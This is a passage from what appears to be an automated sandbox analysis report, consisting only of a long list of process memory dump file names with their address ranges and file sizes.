                                                                                                                                                      Filesize

                                                                                                                                                      52KB

                                                                                                                                                    • memory/5628-209-0x00007FF8C3040000-0x00007FF8C3A2C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.9MB

                                                                                                                                                    • memory/5628-219-0x0000000000900000-0x0000000000901000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5628-231-0x000000001C220000-0x000000001C222000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5640-258-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      584KB

                                                                                                                                                    • memory/5640-253-0x0000000000E70000-0x0000000000E71000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5640-257-0x0000000000DA0000-0x0000000000E31000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      580KB

                                                                                                                                                    • memory/5688-214-0x00007FF8C3040000-0x00007FF8C3A2C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.9MB

                                                                                                                                                    • memory/5688-230-0x0000000002F90000-0x0000000002F92000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5800-421-0x0000000005460000-0x0000000005461000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5800-411-0x0000000071970000-0x000000007205E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.9MB

                                                                                                                                                    • memory/5916-273-0x00007FF8C3040000-0x00007FF8C3A2C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.9MB

                                                                                                                                                    • memory/5916-285-0x0000000002560000-0x0000000002562000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/5948-458-0x00000000017F0000-0x00000000017F1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5948-459-0x00000000017E0000-0x00000000017E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/5948-460-0x0000000000400000-0x00000000015D7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      17.8MB

                                                                                                                                                    • memory/5956-647-0x0000000000550000-0x000000000055B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/5956-646-0x0000000000560000-0x0000000000567000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                    • memory/6000-438-0x0000000002470000-0x0000000002E10000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.6MB

                                                                                                                                                    • memory/6000-441-0x0000000000A00000-0x0000000000A02000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6016-318-0x0000000000F80000-0x0000000000F81000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6016-313-0x0000000071970000-0x000000007205E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.9MB

                                                                                                                                                    • memory/6016-329-0x0000000003240000-0x0000000003241000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6016-341-0x00000000031A0000-0x00000000031A1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6016-335-0x0000000005720000-0x0000000005721000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6016-331-0x000000000E2D0000-0x000000000E2E4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      80KB

                                                                                                                                                    • memory/6096-315-0x00000000029A0000-0x0000000003340000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.6MB

                                                                                                                                                    • memory/6096-322-0x0000000002990000-0x0000000002992000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6156-645-0x00000000010E0000-0x00000000010EC000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                    • memory/6156-644-0x00000000010F0000-0x00000000010F7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                    • memory/6192-330-0x00000000021A1000-0x00000000021A3000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6192-334-0x00000000032E1000-0x00000000032E8000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                    • memory/6216-653-0x0000000005FC0000-0x0000000005FC1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-633-0x0000000000F60000-0x0000000000F61000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-701-0x0000000007270000-0x0000000007271000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-702-0x0000000007970000-0x0000000007971000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-632-0x0000000071970000-0x000000007205E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.9MB

                                                                                                                                                    • memory/6216-652-0x0000000005F60000-0x0000000005F61000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-650-0x0000000005D40000-0x0000000005D41000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-651-0x00000000064D0000-0x00000000064D1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-656-0x0000000006000000-0x0000000006001000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-658-0x0000000006260000-0x0000000006261000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-638-0x0000000005870000-0x0000000005871000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-706-0x0000000005871000-0x0000000005872000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6216-707-0x0000000008FC0000-0x0000000008FC1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6244-443-0x0000000002C60000-0x0000000003600000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.6MB

                                                                                                                                                    • memory/6244-445-0x0000000000DD0000-0x0000000000DD2000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6304-437-0x0000000002AD0000-0x0000000003470000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.6MB

                                                                                                                                                    • memory/6304-440-0x0000000001220000-0x0000000001222000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6332-457-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8.5MB

                                                                                                                                                    • memory/6332-453-0x00000000039E0000-0x00000000039E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6332-454-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8.5MB

                                                                                                                                                    • memory/6332-456-0x00000000039E0000-0x000000000423D000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8.4MB

                                                                                                                                                    • memory/6484-484-0x00000000000E0000-0x00000000000E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6484-482-0x0000000000400000-0x00000000015D7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      17.8MB

                                                                                                                                                    • memory/6484-481-0x00000000000F0000-0x00000000000F1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6540-354-0x0000000000A10000-0x0000000000A17000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                    • memory/6544-475-0x0000000003860000-0x0000000003861000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6544-476-0x0000000000400000-0x0000000000C77000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8.5MB

                                                                                                                                                    • memory/6568-358-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6616-640-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6636-505-0x0000000000120000-0x0000000000121000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6636-533-0x0000000033AC1000-0x0000000033C40000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      1.5MB

                                                                                                                                                    • memory/6636-541-0x00000000345A1000-0x00000000345DF000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      248KB

                                                                                                                                                    • memory/6636-540-0x0000000034441000-0x000000003452A000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      932KB

                                                                                                                                                    • memory/6636-502-0x00000000018F0000-0x00000000018F1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6636-503-0x0000000000400000-0x00000000015D7000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      17.8MB

                                                                                                                                                    • memory/6676-639-0x0000000003070000-0x00000000030E4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      464KB

                                                                                                                                                    • memory/6676-641-0x0000000003000000-0x000000000306B000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      428KB

                                                                                                                                                    • memory/6848-381-0x0000000002650000-0x0000000002652000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6848-377-0x0000000002660000-0x0000000003000000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.6MB

                                                                                                                                                    • memory/6864-378-0x0000000071970000-0x000000007205E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.9MB

                                                                                                                                                    • memory/6864-397-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/6884-383-0x0000000000F40000-0x0000000000F42000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/6884-379-0x0000000002AC0000-0x0000000003460000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      9.6MB

                                                                                                                                                    • memory/6924-380-0x0000000071970000-0x000000007205E000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      6.9MB

                                                                                                                                                    • memory/6924-399-0x0000000001150000-0x0000000001151000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7048-391-0x0000000002161000-0x0000000002163000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/7048-395-0x0000000002891000-0x0000000002898000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      28KB

                                                                                                                                                    • memory/7048-392-0x0000000002851000-0x000000000287C000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      172KB

                                                                                                                                                    • memory/7056-403-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7184-649-0x0000000000760000-0x000000000076F000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      60KB

                                                                                                                                                    • memory/7184-648-0x0000000000770000-0x0000000000779000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/7380-660-0x00000000054E0000-0x00000000054E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-682-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-662-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-654-0x0000000000A10000-0x0000000000A11000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-659-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-667-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-680-0x00000000055E0000-0x00000000055E1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-691-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-678-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7380-689-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7400-655-0x0000000000860000-0x0000000000865000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      20KB

                                                                                                                                                    • memory/7400-657-0x0000000000850000-0x0000000000859000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/7456-625-0x0000000003FF0000-0x0000000003FF1000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/7516-661-0x00000000005C0000-0x00000000005C6000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/7516-663-0x00000000005B0000-0x00000000005BB000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      44KB

                                                                                                                                                    • memory/7604-679-0x00000000007F0000-0x00000000007F4000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                    • memory/7604-681-0x00000000007E0000-0x00000000007E9000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/7716-683-0x00000000009C0000-0x00000000009C5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      20KB

                                                                                                                                                    • memory/7716-685-0x00000000009B0000-0x00000000009B9000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/7880-700-0x00000000030A0000-0x00000000030A9000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      36KB

                                                                                                                                                    • memory/7880-699-0x00000000030B0000-0x00000000030B5000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      20KB

                                                                                                                                                    • memory/9712-711-0x0000000001940000-0x0000000001941000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/9712-712-0x0000000001940000-0x0000000002037000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                    • memory/9712-713-0x0000000000400000-0x0000000000B02000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      7.0MB

                                                                                                                                                    • memory/9712-714-0x0000000000F60000-0x0000000000F61000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB

                                                                                                                                                    • memory/11952-709-0x0000000000F40000-0x0000000000F41000-memory.dmp

                                                                                                                                                      Filesize

                                                                                                                                                      4KB